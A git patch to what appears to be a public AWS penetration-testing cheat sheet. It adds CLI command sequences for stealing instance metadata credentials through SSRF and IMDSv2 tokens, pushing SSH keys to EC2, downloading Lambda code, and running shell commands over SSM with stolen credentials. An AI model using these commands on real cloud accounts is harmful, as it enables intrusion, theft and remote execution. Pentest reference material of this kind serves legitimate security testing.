From 5d87804f714f08dd1f324031925936f986ce2c99 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 6 Mar 2020 13:33:14 +0100 Subject: [PATCH] AWS EC2 Instance Connect + Lambda + SSM --- .../Cloud - AWS Pentest.md | 45 ++++++++++++++++++- 1 file changed, 43 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 621f19f..84f624d 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -14,6 +14,9 @@ * [Admin equivalent permission](#admin-equivalent-permission) * [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) * [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) +* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) +* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) +* [AWS - SSM - Command execution](#aws---ssm---command-execution) * [AWS - Golden SAML Attack](#aws---golden-saml-attack) * [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) * [PenTest:IAMUser/KaliLinux](#) @@ -162,6 +165,18 @@ ## AWS - Metadata SSRF +> AWS released an additional security defences against the attack. + +:warning: Only working with IMDSv1. +Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. + +In order to usr IMDSv2 you must provide a token. + +```powershell +export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` +curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" +``` + ### Method for Elastic Cloud Compute (EC2) Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ @@ -360,13 +375,37 @@ aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` +## AWS - Instance Connect - Push an SSH key to EC2 instance + +```powershell +# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ +$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" +$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds +``` + +## AWS - Lambda - Extract function's code + +```powershell +# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed +$ aws lambda list-functions --profile uploadcreds +$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds +$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds +``` + +## AWS - SSM - Command execution + +```powershell +$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 +$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds +$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds +``` ## AWS - Golden SAML Attack https://www.youtube.com/watch?v=5dj4vOqqGZw https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ -> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user’s password. This attack also bypasses any MFA requirements. +> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. Requirement: * Token-signing private key (export from personnal store using Mimikatz) @@ -492,4 +531,6 @@ https://github.com/DenizParlak/Zeus * [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) * [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md) * [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) -* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) \ No newline at end of file +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) +* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) \ No newline at end of file